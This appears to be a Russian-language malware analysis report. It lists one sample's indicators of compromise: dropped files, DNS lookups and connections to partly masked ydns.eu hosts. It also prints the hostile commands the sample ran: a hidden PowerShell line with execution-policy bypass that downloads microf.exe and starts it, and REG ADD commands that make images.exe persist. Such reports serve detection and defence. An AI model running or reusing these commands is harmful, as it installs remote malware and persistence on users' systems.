Техническая информация
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'Load' = '%ALLUSERSPROFILE%\images.exe'
- http://le#######kokkiskikinew.ydns.eu/microf.exe как %appdata%\microf.exe
- %WINDIR%\syswow64\cmd.exe
- images.exe
- %TEMP%\abdtfhghgdghghВќ.sct
- %APPDATA%\microf.exe
- %ALLUSERSPROFILE%\images.exe
- %TEMP%\abdtfhghgdghghВќ.sct
- 'le#######kokkiskikinew.ydns.eu':80
- 'sd#####fssffs.ydns.eu':6703
- http://le#######kokkiskikinew.ydns.eu/microF.exe
- 'le#######kokkiskikinew.ydns.eu':6703
- DNS ASK le#######kokkiskikinew.ydns.eu
- DNS ASK sd#####fssffs.ydns.eu
- '%APPDATA%\microf.exe'
- '%ALLUSERSPROFILE%\images.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://le#######kokkiskikinew.ydns.eu/microF.exe','%APPDATA%\microF.exe');Sta...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "%ALLUSERSPROFILE%\images.exe"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "%ALLUSERSPROFILE%\images.exe"
- '%WINDIR%\syswow64\reg.exe' ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "%ALLUSERSPROFILE%\images.exe"
- '%WINDIR%\syswow64\cmd.exe'